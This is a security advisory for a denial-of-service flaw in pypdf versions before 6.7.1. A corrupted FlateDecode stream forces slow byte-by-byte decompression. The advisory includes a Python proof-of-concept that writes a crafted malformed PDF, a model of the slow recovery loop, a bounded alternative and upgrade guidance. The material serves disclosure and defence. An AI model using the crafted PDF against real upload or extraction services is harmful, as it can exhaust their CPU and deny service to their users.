pypdf FlateDecode Stream Decompression Denial-of-Service Vulnerability

Vulnerability

A denial-of-service vulnerability has been identified in pypdf, a pure-Python PDF library; versions prior to 6.7.1 are affected. An attacker can craft a PDF containing a malformed FlateDecode (zlib/deflate) stream. When bulk decompression of such a stream fails, the library falls back to decompressing the data one byte at a time in order to salvage as much content as possible, and on a crafted stream that fallback takes far longer than decoding a well-formed stream of the same size.

Impact

Processing an attacker-supplied PDF that contains a malformed FlateDecode stream drives CPU time far above normal, because the library decompresses the stream byte by byte instead of in bulk. Any service that parses untrusted PDFs with an affected pypdf version (for example an upload handler or a text-extraction worker) can be tied up by a single crafted file. The effect is on availability only; no confidentiality or integrity impact is described.

Reproduction

To reproduce, create a PDF whose stream is declared with /Filter /FlateDecode but whose data is not a valid zlib stream (for instance a correctly compressed stream with bytes corrupted in the middle, so that a one-shot decompression fails). Open the file with a version of pypdf prior to 6.7.1 and decode that stream, for example by extracting the page text: the runtime grows markedly as the library decompresses the data byte by byte, whereas 6.7.1 or later completes promptly on the same input.
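The following is an added example for this advisory; it is not pypdf's code and not the change from PR #3644. It builds a malformed FlateDecode stream and wraps it in a minimal one-page PDF for the reproduction step above, models the byte-at-a-time recovery loop described in the Vulnerability section so the number of inflate calls a corrupt stream costs can be counted, and contrasts it with one illustrative way to bound that work (chunked feeding with a snapshot of the inflate state, replaying only the failing chunk byte by byte). The sample payload, the corruption position, the chunk size and all function names are constructed for the demonstration.

```python
"""Added example for this advisory; not pypdf's code and not the PR #3644 fix.

1. make_malformed_flate / build_pdf: a FlateDecode stream that fails one-shot
   zlib.decompress(), wrapped in a minimal one-page PDF (reproduction input).
2. decompress_bytewise: a model of a byte-at-a-time recovery loop; its call
   count shows why a corrupt stream costs one inflate call per input byte.
3. decompress_bounded: one illustrative way to bound that work.
"""
import zlib
from typing import Optional, Tuple

# Constructed sample content: repetitive text that compresses well.
PAYLOAD = b"".join(b"line %05d of constructed page content\n" % i for i in range(2000))
GOOD_STREAM = zlib.compress(PAYLOAD)  # a well-formed FlateDecode body for comparison


def one_shot_decompress_fails(data: bytes) -> bool:
    """True when zlib.decompress() rejects data outright (what triggers a fallback path)."""
    try:
        zlib.decompress(data)
    except zlib.error:
        return True
    return False


def make_malformed_flate(payload: bytes, position: Optional[int] = None) -> bytes:
    """Compress payload, then flip one byte inside the deflate body (hypothetical
    corruption) so that a one-shot zlib.decompress() raises zlib.error."""
    good = zlib.compress(payload)
    if position is None:
        position = len(good) // 2  # after the 2-byte zlib header, before the adler32 trailer
    bad = bytearray(good)
    bad[position] ^= 0xFF
    return bytes(bad)


def build_pdf(stream_data: bytes) -> bytes:
    """Wrap stream_data as the /FlateDecode content stream of a one-page PDF."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(stream_data)
        + stream_data
        + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_offset = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objs) + 1,
        xref_offset,
    )
    return bytes(out)


def decompress_bytewise(data: bytes) -> Tuple[bytes, int]:
    """Model of a recovery loop that feeds inflate one byte at a time and swallows
    errors: every input byte costs one call, even after the stream is already
    known to be corrupt. Returns (output, inflate_calls)."""
    d = zlib.decompressobj()
    out = bytearray()
    calls = 0
    for i in range(len(data)):
        calls += 1
        try:
            out += d.decompress(data[i:i + 1])
        except zlib.error:
            pass  # inflate stays in its error state; the loop still visits every byte
    return bytes(out), calls


def decompress_bounded(data: bytes, chunk: int = 4096) -> Tuple[bytes, int]:
    """Feed inflate in chunks; on the first error, rewind to the state saved before
    that chunk, replay only that chunk byte by byte to salvage the last decodable
    bytes, then stop. Work is O(len/chunk + chunk) calls instead of O(len)."""
    d = zlib.decompressobj()
    out = bytearray()
    calls = 0
    for i in range(0, len(data), chunk):
        block = data[i:i + chunk]
        snapshot = d.copy()  # inflate state before this block
        calls += 1
        try:
            out += d.decompress(block)
        except zlib.error:
            d = snapshot
        else:
            continue
        for j in range(len(block)):  # bounded by chunk, not by len(data)
            calls += 1
            try:
                out += d.decompress(block[j:j + 1])
            except zlib.error:
                return bytes(out), calls
        return bytes(out), calls  # defensive; the replay hits the same error inside the block
    out += d.flush()
    return bytes(out), calls


if __name__ == "__main__":
    bad = make_malformed_flate(PAYLOAD)
    with open("malformed_flate.pdf", "wb") as fh:  # reproduction input for pypdf
        fh.write(build_pdf(bad))
    _, naive_calls = decompress_bytewise(bad)
    salvaged, bounded_calls = decompress_bounded(bad, chunk=512)
    print(f"stream bytes={len(bad)} bytewise calls={naive_calls} bounded calls={bounded_calls}")
    print(f"salvaged {len(salvaged)} bytes before inflate rejected the stream")
```

Running the script writes malformed_flate.pdf; loading that file with a pre-6.7.1 pypdf (for example via pypdf.PdfReader and extracting the page text) under a timer, and then repeating with 6.7.1 or later, shows the difference the advisory describes. In the bounded variant the snapshot costs one copy of the 32 KiB inflate window per chunk, which is why the chunk should be a few kilobytes rather than a few bytes; the output is identical to the byte-by-byte model because inflate's output depends only on the input prefix consumed, not on how it was split.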

Remediation

Upgrade to pypdf 6.7.1 or later. If an immediate upgrade is not possible, the changes from PR #3644 can be backported as a temporary workaround. Independently of this fix, parsing of untrusted PDFs is best isolated in a worker with a CPU-time limit, so that a slow decode of any single file cannot stall the rest of the service.

Added: Feb 20, 2026, 10:22 PM
Updated: Feb 20, 2026, 10:22 PM

Vulnerability Rating

Custom Algorithm
spread: 5.4
impact: 0.6
exploitability: 5.4
remediation: 7.7
relevance: 3.2
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.